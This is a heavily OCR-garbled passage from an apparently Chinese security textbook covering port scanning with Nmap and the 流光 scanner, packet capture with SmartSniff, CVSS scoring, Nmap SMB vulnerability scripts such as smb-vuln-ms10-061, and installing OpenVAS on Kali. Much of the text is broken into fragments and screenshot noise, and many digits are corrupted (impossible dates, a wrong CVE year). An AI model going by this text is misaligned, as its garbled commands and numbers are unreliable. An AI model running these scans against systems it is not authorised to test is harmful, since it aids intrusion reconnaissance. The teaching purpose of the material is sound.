MAC Address: 1C:FA:68:91:2F:08 (Tp-link Technologies) 


Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds 


[step 图 扫描 其 他 端口 ， 如 果 使 用 Nmap -SA 
192.168.1.1 -p 445 命 令 ， 执 行 效果 如 下 图 所 
示 ， 可 以 看 到 445 端 口 存在 过 滤 ， 并 给 出 了 
相应 的 提示 信息 


5 心 o 


Starting Nmap 7.70 ( https://nmap.org ) at 2618-19-28 96:67 ED 
Nmap scan report for 192.168.1.1 
Host is up (98.66032s latency|. 


PORT STATE SERVICE 
445/tcp filtered microsoft-ds 
MAC Address: 1C:FA:68:91:2F:98 (Tp-link Technologies) 


Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds 


11.3 ”实战 演练 


实战 演练 1 一 一 扫描 目标 主机 的 开放 端口 
流光 扫描 器 是 一 款 非常 出 名 的 中 文 多 
功能 专业 扫描 器 ， 其 功能 强大 、 扫 描 速度 
快 、 可 靠 性 强 ， 为 广大 黑客 迷 们 所 钟爱 。 
利用 流光 扫描 器 可 以 轻松 探测 目标 主机 的 
开放 端口 。 下 面 将 以 探测 POP3 主 机 的 开放 
端口 为 例 进行 介绍 。 
Bep 国 单 去 桌面 上 的 流光 扫描 器 程序 图 标 ， 


启动 流光 扫描 器 ， 如 下 图 所 示 。 
国 Be (E50) Build 3310 (ORF) 0 
is) EV NNEC) TIR wa 


未 本 | 


Dves 
口 估 并 中 旋 雪 ” 
EA [E27 7 ET TR 


区 J 本 6 1955-2007 和 作 员 白人 所 
| 上 


3 加 再 TE 


[ 用 户 ba EE 六 
[step 图 单 击 “ 选 项 ”一 “系统 设置 ” 菜单 
命令 ， 打 开 “ 系 统 设置 ”对 话 框 ， 对 优先 
级 、 线 程 数 、 单 词 数 /线程 及 扫描 端口 进行 
设置 ， 如 下 图 所 示 。 

系统 设置 


让 端口 
Pop3: [| 面 tmp: [wo 


80 
] FrP: |21 SMTP: |25 
二 十 PROXY [soa0 sa: [1433 


优先 级 钱 程 款 单间 者 / 旺 程 


口 自动 调整 线程 设置 确定 (0) | | 取消 @ | 
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Ee 间 洒 机 和 


[step 加 打开 “添加 主机 (HTTP) ”对 话 
框 ， 在 该 对 话 框 的 下 拉 列 表 框 中 输入 要 扫 
描 主 机 的 IP 地 址 (这 里 以 192.168.0.105 为 
例 ) ， 如 下 图 所 示 。 


添加 主机 (HTTP) 


192.168.0.109 | 
习 自动 更 新 主机 列表 (@) 习 使 用 自动 完成 功能 他) 


确定 (0) | | 取消 C) | 


[step 图 此 时 ， 在 主 窗 口中 将 显示 出 刚刚 添加 
的 HTTP 主 机 ， 右 击 此 主机 ， 在 弹出 的 快捷 
菜单 中 依次 选择 “探测 ”一 “扫描 主机 端 
口 ” 人 如 下 图 所 示 。 


[Eee 图 在 扫描 器 主 窗口 中 选中 “HTTP 主 
机 ” 复 选 框 ， 然 后 右 击 ， 在 弹出 的 快捷 菜 
单 中 选择 “编辑 ”一 “添加 ”选项 ， 如 下 
图 所 示 。 


医 et 
站 
一 一 一 出 户 时间 0 EL 
step 图 打开 “端口 探测 设置 ”对 话 框 ， 在 该 


交 法 儿 时 近 间 “ 自 定义 端口 探测 范围 ” 复 
选 框 ， 然 后 在 “范围 ”选项 区 中 设置 要 探 
测 端口 的 范围 ， 如 下 图 所 示 。 
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于 
田 让 XO 
到 国 
WOR [50 ”到 [oo 
[aeo | | aaso | 


step 轩 设置 完成 后 ， 单 击 “ 确 定 ” 按 钮 ， 开 
始 探测 目标 主机 的 开放 端口 ， 如 下 图 所 示 。 


eset (Wie.0] Bld 3310 (0F 


区 办 人 实地 生 1995 2002 小 稳 作品 后 可 所 
刻 吾 主 由 


step 回 单 去 桌面 上 的 SmartSniff 程 序 图 标 ， 
打开 SmartSniff 程 序 主 窗口 ， 如 下 图 所 示 。 


届 smarsniff 一 口 全 
文件 (入 饭 (日 、 视 大 (V) 选项 (O) 帮助 (H) 

p 

可 31 。 ”协议 本 地 地 址 远程 地 址 本 地 往 口 。 远程 江口 

< > 


单 击 “开始 捕 提 ”按钮 或 按 F5 键 ， 开 
始 捕获 当前 主机 与 网 络 服务 器 之 间 传 输 的 
数据 包 ， 如 下 图 所 示 。 


计 采 度 本 到 
扫描 完毕 后 ， 将 会 自动 弹出 “ 探 
果 ” 对 话 框 ， 如 果 目 标 主机 存在 开放 端口 
就 会 在 该 对 话 框 中 显示 出 来 ， 如 下 图 所 示 。 


探 开 8 果 


探测 结 


开放 端口 : 


者 1010oos0.… 革 让 ro 
主机 192 168.0.105 喘 Do080… 


区 | 


实战 演练 2 一 一 捕获 网 络 中 的 TCP/IP 数 
据 包 


SmartSniff 工 具 可 以 让 用 户 捕获 自己 
的 网 络 适 配器 的 TCP/IP 数 据 包 ， 并 且 可 以 
按 顺 序 查看 客户 端 与 服务 器 之 间 会 话 的 数 
据 。 用 户 可 以 使 用 ASCII 模 式 〈 用 于 基于 
文本 的 协议 ， 如 HTTP、SMTP、POP3 与 
FTP) 、 十 六 进 制 模式 来 查看 TCP/IP 会 话 
〈 用 于 基于 非 文 本 的 协议 ， 如 DNS) 。 

利用 SmartSniff 捕 获 TCP/IP 数 据 包 的 具 
体操 作 步 骤 如 下 : 
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加 smartsniff 一 口 x 


文件 (月 ” 妨 强 (E) 视图 (V) 选项 (O) 帮助 (H) 
,加 是 
票 引 。。 协议 ”本 地 地 址 远程 地 址 本 地 身 口 。 ”远程 江口 和 
1 Ubp 192.168.0.105 123.151.78.54 4022 8000 
2 Tp 192.1680.105 125.88.219.247 3255 443 
3 Tp 192.168.0.105 180.149.131.35 3388 443 
4 Tp 192.168.0.105 180.149.131.35 3389 443 
5 TCP 192.168.0.105 125.77.198.152 53891 80 多 
> 
已 经 丘 牙 27 个 数 泌 包 


[Step 图 单 击 “ 停 止 捕 获 ” 按 钮 或 按 F6 键 ， 停 
止 捕获 数据 ， 在 列表 中 选择 任意 一 个 TCP 类 
型 的 数据 包 ， 即 可 查看 其 数据 信息 ， 如 下 


图 所 示 。 

发 Smarsnf < 首 

文件 肯 。 狂 各 日 视 玛 V) 运 贰 (O) 孝 助 (H) 

> 平生 | 口 回 四 加 和 

Ed 坊 议 本 地 下 址 运程 地 站 地 MED 远 得 江口 本 地 主机 
2 Upp 021680106 1021630255 138 18 pesoscve 
3 upp 55 e36016208 5000 a009 DESKTOP-ING, 
supp Tae720144 so0 go00 DeskTop-snNA 
re az pesarop era 


DESKTOpP-6TNQ ~ 


CA 6F 01 00 00 91 00 08 00 09 09 00 63 77 77 77 -0-- 
88 717 65 68 61 $0 60 65 72 a2 63 6E BG G0 01 00 uehanme r.cn 


6F 81 8 ee 91 90 01 69 09 99 00 @3 77 77 77 
17 65 68 61 6D bp 65 72 gz 53 6E se 69 91 99 


[Step 图 在 列表 中 选择 任意 一 个 UDP 类 型 的 数 
据 包 ， 即 可 查看 其 数据 信息 ， 如 下 图 所 示 。 


第 11 章 ”扫描 无 线 网 络 中 的 主机 ”= 


国 Smarsnif -日 % 
交 件 |” 编 嘲 (E) 讽 图 VM) 连 项 (O) 帮助 (H) 
Pa 了 入 | 口 加 名 名 届 


EE E73 本 地 潜 口 。” 远 E 实 口 。 ”本 区 主 岂 加 

@ UDP 19a168a106 192.168.0.255 138 138 DESKTOP-SCVE.. 
UDP 。 1921680105 119.147.201.44 5001 3000 DESKTOP-67NQ-. 
Tp 1921680105 12576247169 3421 a0 DESKTOP-67NQ- 
Tp 1521680.105 12576247.1s9 3423 0 DESKTOP-67NQ-. 
UDp 1921680105 61128114134 50524 532 DESKTOP-67NQ- 
Tcp ~ 1521680.105 120.5588.244 3511 a0 DESKTOP-67NQ-. ~ 


02 63 90 00 90 4 13 89 Ah 68 96 6 33 ED 61 99 
ae 01 E3 34 E2 39 BB 56 B5 48 68 88 58 00 45 85 
DB 66 Ba 39 DD EF 9E ge Fé A Be BD h7 C2 ec 90 
Ag 10 24 EB 4D AF 61 59 72 16 1E 9F 40 1D AA 68 
CD Dg FE6 DS gD Cé Ba 77 96 SF A3 18 69 Mh 85 pn 
11 bn 99 3 
SS 和 4 个 CP/IPS 责 已 芝 1 个 


[Step 图 在 列表 中 选中 任意 一 个 数据 包 ， 单 击 
“视图 ”一 “网 页 报告 -TCP/IP 数 据 流 ” 命 
令 ， 即 可 以 网 页 形式 查看 数据 流 报 告 ， 如 
下 图 所 示 。 


step 图 在 列表 中 选中 任意 一 个 数据 包 ， 单 击 
“文件 ”一 “属性 ”菜单 命令 ， 在 弹出 的 
“属性 ”对 话 框 中 可 以 查看 其 属性 信息 ， 
如 下 图 所 示 。 

属性 x 
案 引 : 38 


协议 : UDP __ 
192.168.0.105 


本 地 地 址 : 
远程 地 址 : 
本 地 端口: 5000 
远程 端口: 8000 
本 地 主机 : 
远程 主机 : 
服务 名 称 : 

包 : 

数据 大 小 : 
总 大 小 : 

数据 速率 : 
捕获 时 则 : 
最 后 包 体 时 间 : 
进程 ID: 

进程 文件 名 : 
进程 用 户 : 

加 载 MAC 地 址 : 
远程 MAC 地 址 : 
本 地 IP 国 家 : 
远程 IP 国 家 : 


DESKTOP-67NQBIF.DHCP HOST 


2017/18115 


到 x|F -gx 
© D 合 。 加 fileWW/DV360 安 全 测 和 QA 口 口 ， 三 
DD 各 ww Dnt 门生 国 风 t [= 于 
数据 流 报告 
索引 起 
协议 UDP 
本 地 地 址 192. 168. 0. 105 
远程 地 址 61. 128. 114. 134 
本 地 英 口 B0524 
远程 端口 53 
本 地 主机 。 DasFToP-e7WQBIF. CHCF HDsT 
远程 主机 。 || ts. xi. rsleccn con 


FE Cy 


11.4 ”小 试 身手 


练习 1: 扫描 主机 的 各 种 端口 。 
扫描 主机 的 Banner 信 息 。 
扫描 主机 的 常见 协议 。 
探测 主机 的 防火 墙 。 


207 


第 12 半 ”无线 网 络 中 主机 漏洞 的 
安全 防护 


漏洞 是 在 硬件 、 软 件 、 协 议 的 具体 实现 或 系统 安全 策略 上 存在 缺陷 ， 从 而 可 以 使 攻 
击 者 能 够 在 未 授权 的 情况 下 访问 或 破坏 系统 。 本 章 介绍 如 何 对 无 线 网 络 中 的 主机 进行 漏洞 
扫描 ， 主 要 包括 系统 漏洞 概述 、 系 统 漏洞 评分 标准 一 一 CVSS、 使 用 Nmap 扫 描 漏洞 、 使 用 
OpenVAS 扫 描 漏洞 、 使 用 Nessus 打 描 漏洞 、 系 统 漏洞 的 安全 防护 等 。 


812.1 系统 漏洞 概述 


计算 机 系统 漏洞 也 被 称 为 系统 安全 缺 
陷 。 这 些 安全 缺陷 会 被 技术 高 低 不 等 的 入 
侵 者 所 利用 并 达到 控制 目标 主机 或 造成 一 
些 更 具 破 坏 性 的 目的 。 


12.1.1 系统 漏洞 的 定义 


系统 漏洞 是 指 应 用 软件 或 操作 系统 软 
件 在 逻辑 设计 上 的 缺陷 ， 或 在 编写 时 产 
生 的 错误 ， 某 个 程序 (包括 操作 系统 ) 
在 设计 时 未 考虑 周全 ， 则 这 个 缺陷 或 错误 
六 将 可 能 被 不 法 者 或 黑客 利用 ， 通 过 植 入 病 
” 毒 等 方式 来 攻击 或 控制 整个 计算 机 ， 从 而 
窃取 计算 机 中 的 重要 资料 和 信息 ， 甚 至 破 
坏 系统 。 

系统 漏洞 又 称 安全 缺陷 ， 可 对 用 户 造 
成 不 良 后 果 。 如 系统 漏洞 被 恶意 用 户 利用 ， 
会 造成 信息 泄露 ， 黑 客 攻 击 网 站 即 利用 网 络 
服务 器 操作 系统 的 漏洞 ， 对 用 户 操作 造成 不 
便 ， 如 不 明 原因 的 死机 和 丢失 文件 等 。 


12.1.2 ”系统 漏洞 产生 的 原因 


系统 漏洞 的 产生 不 是 安装 不 当 的 结 
果 ， 也 不 是 使 用 后 的 结果 ， 它 受 编程 人 员 
的 能 力 、 经 验 和 当时 安全 技术 所 限 ， 在 程 
序 中 难免 会 有 不 足 之 处 。 

归结 起 来 ， 系 统 漏洞 产生 的 原因 主要 
有 以 下 几 点 : 


(1) 人 为 因素 。 编 程 人 员 在 编写 程序 
过 程 中 故意 在 程序 代码 的 隐蔽 位 置 保留 了 
后 门 。 

(2) 硬件 因素 。 因 为 硬件 的 原因 ， 编 
程 人 员 无 法 弥补 硬件 的 漏洞 ， 从 而 使 硬件 
问题 通过 软件 表现 出 来 。 

(3) 客观 因素 。 受 编程 人 员 的 能 力 、 
经 验 和 当时 的 安全 技术 及 加 密 方法 所 限 ， 
在 程序 中 不 免 存在 不 足 之 处 ， 而 这 些 不 足 


恰恰 会 导致 系统 漏洞 的 产生 。 
12.2 系统 漏洞 评分 标准 一 一 
CVSS 


通用 弱点 评价 体系 (CVSS) 是 由 
NIAC 开 发 、FIRST 维 护 的 一 个 开放 并 且 能 
够 被 产品 厂商 免费 采用 的 标准 。 利 用 该 标 
准 ， 可 以 对 弱点 进行 评分 ， 进 而 帮助 我 们 
判断 修复 不 同 弱点 的 优先 等 级 。 


V2:2:1 


CVS5 简 介 

CVSS (Common Vulnerability Scoring 
System 通 用 漏洞 评分 系统 ) 是 一 个 行业 公 
开标 准 。 可 以 帮助 人 们 建立 衡量 漏洞 严重 
程度 的 标准 ， 使 得 人 们 可 以 比较 漏洞 的 严 
重 程度 ， 从 而 确定 处 理 它 们 的 优先 级 。 

CVSS 得 分 基于 一 系列 维度 上 的 测量 
结果 ， 这 些 测量 维度 被 称 为 量度 (Met- 


rics) 。 漏 洞 的 最 终 得 分 最 大 为 10， 最 小 为 
0。 得 分 在 7 一 10 中 的 漏洞 是 高 危 漏 洞 通常 
被 认为 比较 严重 ， 得 分 在 4 一 6.9 中 的 是 中 级 
漏洞 ， 得 分 在 0 一 3.9 中 的 则 是 低级 漏洞 。 

CVSS 系 统 包括 三 种 类 型 的 分 数 : 基本 
分 、 暂 时 分 和 环境 分 。 其 中 ， 基 本 分 和 和 暂 
时 分 通常 由 安全 产品 卖主 、 供 应 商 给 出 
因为 他 们 能 够 更 加 清楚 地 了 解 漏洞 的 详细 
信息 ; 环境 分 通常 由 用 户 给 出 ， 因 为 他 们 
能 够 在 自己 的 使 用 环境 下 更 好 地 评价 该 漏 
洞 存在 的 潜在 影响 。 
12.2.2 CVSS 计 算 方法 

CVSS 有 自己 的 一 套 漏 洞 评分 计算 方 
法 ， 但 也 有 一 些 指标 具有 不 确定 性 和 复杂 


性 ， 会 导致 完全 的 定量 分 析 困 难 。 它 采用 3 
个 客观 性 指标 和 11 个 主观 性 指标 。 


1. 基本 评价 

基本 评价 指 的 是 该 漏洞 本 身 固 有 的 一 
些 特 点 ， 及 这 些 特点 可 能 造成 的 影响 评价 
分 值 。 

(1) 攻击 途径 (AccessVector) 。 如 果 
是 本 地 攻击 给 0.7， 可 以 远程 攻击 给 1.0。 

(2) 攻击 复杂 度 (AccessComplexity) 。 
分 为 3 个 标准 分 别 是 低 、 中 、 高 ， 给 出 的 
分 值 为 0.6、0.8、1.0。 

(3) 认证 (Authentication) 。 需 要 认证 
给 0.6， 不 需要 认证 给 1.0。 

(4) 机 密 性 (ConfImpact) 。 不 受 影响 
给 0， 部 分 影响 0.7， 完 全 影响 1.0。 

(5) 完整 性 (IntegImpact) 。 不 受 影响 
给 0， 部 分 影响 0.7， 完 全 影响 1.0。 

(6) 可 用 性 (AvailIlmpact)〉。 不 受 影响 
给 0， 部 分 影响 0.7， 完 全 影响 1.0。 


2. 生命 周期 评价 
生命 周期 评价 是 针对 最 新 类 型 漏洞 
〈 如 0day 漏 洞 ) 设置 的 评分 项 ， 因 此 SQL 注 
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入 漏洞 不 用 考虑 。 这 里 列举 出 了 3 个 与 时 间 
紧密 关联 的 要 素 ， 具 体 介绍 如 下 : 

(1) 可 利用 性 。 未 证 明 0.85， 概 念 证 
明 0.9， 功 能 性 0.95， 完 全 代码 1.0。 

(2) 修复 措施 。 官 方 补丁 0.87， 临 时 
补丁 0.9， 临 时 解决 方案 0.95， 无 措施 1.0。 

(3) 确认 程度 。 不 确认 0.9， 未 经 确认 
0.95， 已 确认 1.0。 


3. 环境 评价 

每 个 漏洞 会 造成 的 影响 大 小 都 与 用 户 
自身 的 实际 环境 密 不 可 分 ， 因 此 可 选项 中 
也 包括 了 环境 评价 。 可 以 由 用 户 自 评 。 

(1) 危害 影响 程度 。 无 0.0， 低 0.1， 
中 0.3， 高 0.5。 

(2) 目标 分 布 范围 。 无 0.0， 低 0.25， 
中 0.75， 高 10 (0、1% 一 15%、16% 一 
49%、50% 一 100%) 。 

评分 与 危险 等 级 对 应 如 下 : 

e@ [0，4): 被 认为 是 低级 威胁 。 

e [4，7): 被 认为 是 中 级 威胁 。 

e [7，10]: 被 认为 是 高 级 威胁 。 

不 同 机 构 按照 CVSS 分 值 定义 威胁 
的 低 、 中 、 高 级 别 ，CVSS 体 现 漏 洞 的 风 
险 ， 威 胁 级 别 表示 漏洞 风险 对 系统 的 影响 
程度 ，CVSS 分 值 是 工业 标准 ， 威 胁 级 别 
不 是 。 


12.3 ”使 用 Nmap 扫 描 漏洞 


Nmap 自 带 有 大 量 脚本 ， 通 过 脚本 配置 
规则 ， 并 配合 进行 漏洞 扫描 。 


12.3.1 脚本 管理 


Nmap 有 一 个 脚本 数据 库 文件 ， 使 用 该 
数据 库 可 以 对 所 有 的 脚本 进行 分 类 管理 。 
查看 脚本 数据 库 文件 的 方法 为 :在 usr/share/ 
Nmap/scripts 目 录 中 有 一 个 script.db 文 件 。 
该 文件 用 于 维护 Nmap 所 有 脚本 文件 ， 在 
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Kali Linux 命 令 执行 窗口 中 输入 cat script.db 命 令 ， 即 可 查看 数据 库 内 容 ， 执 行 效果 如 下 图 
所 示 。 


oot@kali: /usr/share/namap/scripts# cat script.db 

ntry { = "acarsd-info.nse", categories = { "discovery", "safe", } } 
ntry { “address-info.nse", categories = { "default", "safe", } } 
ntry { -brute.nse", categories = { "brute", "intrusive"”, } } 
ntry { -ls.nse", categories = { "discovery", "safe", } } 
ntry { -path-vuln.nse", categories = { "exploit", "intrusive" 
ntry { -serverinfo.nse", categories "default" 

ntry { -shownount .nse", categories = { "discovery"， 

ntry { -auth.nse", categories = { "auth", "default", 

ntry { -brute.nse", categories = { "brute", "intrusive”, } } 
ntry { -headers.nse"”, categories = { "discovery"”, "safe", } } 


每 一 个 脚本 后 面 都 有 一 个 分 类 (categories) 信息 ， 分 别 是 默认 (default) 、 发 现 
(discovery) 、 安 全 (safe) 、 暴 力 (brute) 、 入 侵 (intrusive) 、 外 部 的 (external)、 
漏洞 检测 〈(vuln) 、 漏 洞 利 用 〈exploit) 。 

另外 ， 如 果 执 行 less script.db | we -] 命 令 ， 可 以 查看 到 目前 Nmap 有 588 个 脚本 ， 如 下 图 
所 示 。 


Foot@kali: /usr/share/nmap/scripts# Tess script.db | wc 
588 


侈 提示 : 如 果 用 于 检测 ， 尽 量 挑选 safe 字 段 的 脚本 进行 扫描 ， 否 则 可 能 因为 扫描 导致 目标 
主机 系统 不 稳定 。 


12.3.2 ”扫描 演示 


使 用 Nmap 的 脚本 文件 ， 可 以 扫描 系统 漏洞 ， 下 面 以 smb-vuln-ms10-061.nse 脚 本 为 
例 ， 来 介绍 使 用 Nmap 进 行 漏洞 扫描 的 方法 ，smb-vuln-ms10-061 是 Stuxnet 蠕 虫 病毒 利用 的 
4 个 漏洞 之 一 ， 该 漏洞 是 由 于 Print Spooler 权 限 配置 不 当 造 成 的 ， 这 个 漏洞 可 使 打印 请 求 在 
系统 目录 下 创建 文件 、 执 行 任意 代码 等 。 

使 用 Nmap 扫 描 漏洞 的 操作 步骤 如 下 : 
step 加 使 用 less script.db | grep smb-vuln 命 令 。 和 节选 出 符合 标准 的 脚本 文件 ， 执 行 效果 如 下 
图 所 示 。 


FaatBRHUIS7UST7SWarE7TWSP7SETIPES Less SCFIPEt-d6 | grep Sn6-VUUT 
Entry { filename = "Smb-vutn-conficker.nse"，categories = { "dos", "exploit", "intrusive", "vuln", } } 


smb-vuln-cve-2917-7494.nse”, categories = { “intrusive”, “vuln", } } 
smb-vuLn-cve2699-3163.nse"，categories = s", "exploit", "intrusi 
smb-vuln-ms06-025.nse", categories 本 "exploit", "intrusive" 
smb-vuln-mse7-029.nse”", categories exploit", * 
smb-vuln-ms98-967.nse", categories = ， "exploit" 
smb-vuLn-ms16-954.nse"，categories = { "intrusiv 
smb-vuln-ms10-661.nse", categories = { “intrusive", "vuln", } } 
smb-vuln-ms17-016.nse", categories = { "safe", "vuln", } } 


示 ， 可 以 看 到 CVSS 评 分 达到 了 9.3 分 ， 因 此 这 个 漏洞 是 一 个 高 危 漏洞 。 


{D5 SETIDE TESULLST 
smb-vutn-ms19-961: 
VULNERABLE: 
Print Spooler Service Inpersonation Vulnerability 
State: VULNERABLE 
IDs: CVE:CVE-2019-2729 
Risk factor: HIGH CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) 
Description: 
The Print Spooler service in Microsoft Windows Xp,Server 2003 Sp2,Vista,Server 2008, and 7, when printer sharing is enabled, 
does not properly valldate spooler access pernissions, which allows remote attackers to create files in a systen directory, 
and consequently execute arbitrary code, by sending a crafted print request over RPC, as exploited in the wild in Septenber 2810, 
aka “Print Spooler Service Impersonation Vulnerability.~ 


Disclosure date: 2919-69-5 
References: 
http://cve.mitre.org/cgi-bin/cvenane. cgi?nare=CVE-2010-2729 
http://technet.nicrosoft.con/en-us/security/bulletin/Hs16-061 
http://blogs. technet. cow/b/srd/archive/2810/89/14/ms16-061-printer-spooler-vulnerability.aspx, 
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step 图 如 果 通 过 smb-vuln-ms10-061.nse 脚 本 没有 发 现任 何 漏洞 。 还 可 以 尝试 使 用 smb-enum- 
shares.nse 脚 本 。 该 脚本 会 对 目标 主机 进行 枚 举 ， 发 现 所 有 可 能 存在 的 共享 。 使 用 less 
script.db | grep smb-enum 命 令 ， 筛 选 出 该 脚本 文件 ， 执 行 效果 如 下 图 所 示 。 


root@kali: /usr/share/nmap/scripts# less script.db | grep smb-enum 

ntry { filename = "smb-enum-domains.nse", categories = { "discovery", "intrusive", } } 
ntry { filename 
ntry { filename 
ntry { filename 
ntry { filename 
ntry { filename 
:ntry { filename = 


step 园 使 用 Nmap -p445 192.168.1.105 --script=smb-enum-shares.nse 命 令 。 可 以 发 现 通过 枚 举 
脚本 发 现 目标 机 器 开放 445 端 口 ， 执 行 效果 如 下 图 所 示 。 


root@kali: /usr/share/nmap/scripts# nmap -p445 192.168.1.105 --script=smb-enum-shares.ns 
Starting Nmap 7.790 ( https://nmap.org ) at 2918-16-29 65:35 EDT 

Nmap scan report for 192.168.1.165 

Host is up (9.99946s Latency) . 


"smb-enum-groups.nse"，categories = { "discovery", "intrusive", } } 
“smb-enum-processes.nse", categories = { "discovery", "intrusive”, } } 
"smb-enum-services.nse", categories = { "discovery", "intrusiv saf 
-enum-sessions.nse", categorie: discovery intrusiv' 
-enum- categories discover' trusive"”, } 
"smb-enum-users.ns categories = { "auth"，"intrusive"，} } 


Ca 


PORT STATE SERVICE 
445/tcp open microsoft-ds 
C Address: 99:9C:29:FA:DD:2A (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 6.55 seconds 


step 图 使 用 Nmap -p 445 192.168.1.105 --script=smb-vuln-ms10-061 命 令 。 扫 描 主 机 发 现 并 不 
存在 该 漏洞 。 这 个 现象 在 漏洞 扫描 中 也 很 正常 ， 并 不 是 所 有 开放 端口 的 机 器 都 存在 漏洞 ， 
执行 效果 如 下 图 所 示 。 


[root@kali: /usr/share/nmap/scripts# nmap -p 445 192.168.1.165 --script=smb-vuln-ms10-66] 
Starting Nmap 7.76 ( https://nmap.org ) at 2018-10-29 65:46 EDT 

Nmap scan report for 192.168.1.195 

Host is up (9.99932s latency). 


PORT STATE SERVICE 
445/tcp open microsoft-ds 
IAC Address: 699:6C:29:FA:DD:2A (VMware) 


Host script results: 
| _smb-vutn-ms10-661: false 


Pap done: 1 IP address (1 host up) scanned in 69.57 Seconds 
Iroot@kali: /usr/share/nmap/scripts# nmap -p 445 192.168.1.163 --script=smb-vuLn-ms10-06. 


12.4 ”使 用 OpenVAS 扫 描 漏洞 


OpenVAS (Open Vulnerability Assessment System) 是 一 个 开放 式 漏洞 评估 系统 ， 其 核 
心 部 分 是 一 个 服务 器 。 该 服务 器 包括 一 套 网 络 漏洞 测试 程序 ， 可 以 检测 远程 系统 或 应 用 程 
序 中 的 安全 问题 。 


Die 


12.4.1 安装 OpenVAS 


默认 情况 下 ，Kali 系 统 并 没有 安装 该 扫描 工具 ， 因 此 想 要 使 用 它 必须 要 先 安装 。 在 
Kali 系 统 中 安装 OpenVAS 的 操作 步骤 如 下 : 
step 回 在 Kali Linux 系 统 的 命令 执行 界面 中 输入 apt-get install openvas 命 令 ， 执 行 效果 如 下 图 
所 示 。 
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root@kali:-# apt-get install openvas 

正在 读 取 软 件 包 列 表 ... 完成 

正在 分 析 软 件 包 的 依 赖 关系 树 

正在 读 取 状态 信息 ... 完成 

下 列 软件 包 是 自动 安装 的 并 且 现 在 不 需要 了 : 

libbind9-168 libdns1192 Libirs169 Libisc169 Libisccc169 Libisccfg169 
LibUwres169 libpoppler74 libprotobuf-litele Libprotobuf16 Libradare2-2.9 
libunbound2 Libx265-169 python-backports.ssl-match-hostname 
python-beautifulsoup python-jwt ruby-terminal-table 
ruby-unicode-display-width 

使 用 'apt autoremove' 来 卸载 它 (它们 ), 


step 图 安装 过 程 会 提示 将 要 安装 哪些 库 及 支持 文件 ， 并 给 出 建议 安装 文件 ， 如 下 图 所 示 。 


用 会 同时 安装 下 列 软件 : 

doc-base fonts-texgyre gnutls-bin greenbone-security-assistant 
greenbone-security-assistant-common libhiredise.14 Libtua5.1-9 
libmicrohttpd12 libopenvas9 libradcli4 libuuid-perl libyaml-tiny-perl 
lua-cjson openvas-cli openvas-manager openvas-manager-common openvas-scanner 
preview-latex-style redis-server redis-tools tex-gyre 
texlive-fonts-recommended texlive-latex-extra texlive-latex-recommended 
texlive-pictures texlive-plain-generic tipa 

建议 安装 : 

rarian-compat openvas-client pnscan strobe ruby-redis 
textive-fonts-recommended-doc icc-profiles libfile-which-perl 
libspreadsheet-parseexcel-perl texlive-latex-extra-doc 

texlive-latex- recommended-doc texlive-pstricks dot2tex prerex ruby-tcltk 
| Libtcttk-ruby texlive-pictures-doc vprerex 


由 同时， 在 界面 的 下 面 会 提示 是 否 安装 文件 ， 如 下 图 所 示 。 


I 下列 【新 】 软 件 包 将 被 安装 ; 

doc-base fonts-texgyre gnutls-bin greenbone-security-assistant 
greenbone-security-assistant-common libhiredis9.14 liblua5.1-0 

libmicrohttpd12 libopenvas9 libradcli4 libuuid-perl libyaml-tiny-perl 
lua-cjson openvas openvas-cli openvas-manager openvas-manager-common 
openvas-scanner preview-latex-style redis-server redis-tools tex-gyre 
texlive-fonts-recommended texlive-latex-extra texlive-latex-recommended 
texlive-pictures texlive-plain-generic tipa 

升级 了 9 个 软件 包 ,新 安装 了 28 个 软件 包 ， 要 卸载 9 个 软件 包 ,有 9 个 软件 包 未 被 升级 
人 85.6 MB 的 归档 。 


压缩 后 会 消耗 252 MB 的 番外 空间 。 
希望 继续 执行 吗 ? [Y/n] y 


[te 图 如 果 需 要 安装 ， 这 时 可 以 按 Y 键 执行 安装 ， 如 下 图 所 示 。 


FaatEBRaUIS-W 0pcnva5-5et0p 


>) Updating OpenVAS feeds 

*] [1/3] vpdating: MVT 

-2618-10-28 21:57:98-- http://dl.greenbone.net/conmunity-nvt- feed-current.tar.bz2 

在 解析 主机 dl.greenbone.net (dl.greenbone.net).. 0:2909:127::d1 
在 连接 .greenbone.net (dl.greenbone.net) |89.146.224.58|:89. -已 连 拉 。 

发 出 HTTP 请 求 ， 正 在 等 待 回应 ,. 。268 OK 

匿 : 36297248 (29M) [application/octet-stream] 

在 保存 至 ;“/tmp/greenbone-nvt-sync.ULkb7T24I3/openvas-feed-2018-10-28-5266. tar.bz2” 


tmp/greenbone-nvt-sync.UL 100%[= 28.81M 6.65MB/s 用 时 5.7s 


018-10-28 21:57:16 (5.65 MB/s) - 已 保存 “/tnpy/greenbone-nvt-sync.ULkb7Tz4T3/openvas-feed-2918-19-28- 
5266,tar,bz2z”[30297248/39297248] | 


耐心 等 待 安装 完成 。 这 里 会 有 一 个 初始 密码 ， 一 定 要 先 保存 这 个 密码 ， 否 则 无 法 登 
录 系 统 ， 如 下 图 所 示 。 


[7J Opening Web UI (https://127.0.0.1:9392) in: 5... 4... 3... 2... 1.. 


[>] Checking for admin user 始 密码 
[7] Creating admin user 初 
User created with password【|fd439f97-1918-479d-a3f2-229f7926c179 小 


Lz] Done 


Step 图 由 于 OpenVAS 是 一 个 非常 庞大 的 漏洞 扫描 库 ， 因 此 安装 过 程 中 可 能 会 出 现 文件 缺少 
等 错误 ， 这 时 ， 可 以 使 用 openvas-check-setup 命 令 ， 检 查 安 装 是 否 完整 ， 如 下 图 所 示 。 


FE seems LIKE your UpenVAS-y InstaLLatIOT ITS OK- 


If you think it is not OK, please report your observation 
nd help us to improve this check routine: 
ttp://lists.wald.intevation.org/mailman/listinfo/openvas-discuss 

Lease attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the problem 
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侈 提 示 : 在 检查 安装 结果 中 ， 如 果 看 到 提 
示 OK， 表 明正 常安 装 完成 ， 如 果 出 现 错 
误 ， 这 里 会 给 出 尝试 修复 的 建议 。 


[ep 加 如 果 安 装 完成 忘记 保存 初始 密码 ， 
可 以 通过 openvasmd --get-users 命 令 ， 查 看 
OpenVAS 中 都 有 哪些 用 户 ， 当 然 如 果 是 初次 
安装 只 会 有 一 个 管理 员 账 号 ， 如 下 图 所 示 。 


人 usr/share/namap/scripts# openvasmd 
dmin 


-get-users 


[step 图 由 于 OpenVAS 是 安全 漏洞 扫描 工 
